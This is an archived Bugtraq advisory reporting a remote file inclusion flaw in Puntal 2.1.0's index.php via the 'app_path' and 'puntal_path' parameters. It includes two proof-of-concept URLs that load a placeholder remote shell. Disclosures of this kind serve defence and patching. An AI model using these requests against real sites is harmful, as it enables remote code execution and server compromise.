[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Puntal (index.php) Remote File Inclusion Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Puntal (index.php) Remote File Inclusion Vulnerabilities
From: eidelweiss@xxxxxxxxxxxxxxxxx
Date: Mon, 3 May 2010 12:10:25 -0600

Puntal could allow a remote attacker to include malicious PHP files. A remote 
attacker could send a specially-crafted URL request to the "index.php" script 
using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP 
file from a remote system, which would allow the attacker to execute arbitrary 
code on the vulnerable system.

Puntal 2.1.0 is vulnerable; other versions may also be affected.

An attacker can exploit these issues via a browser.

-=[P0C]=-

http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
            or
http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll

Follow-Ups:
- RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
  - From: Tom Walsh - lists

Prev by Date: [SECURITY] [DSA 2040-1] New squidguard packages fix several vulnerabilities
Next by Date: [ MDVSA-2010:089 ] gnutls
Previous by thread: [SECURITY] [DSA 2040-1] New squidguard packages fix several vulnerabilities
Next by thread: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
Index(es):
- Date
- Thread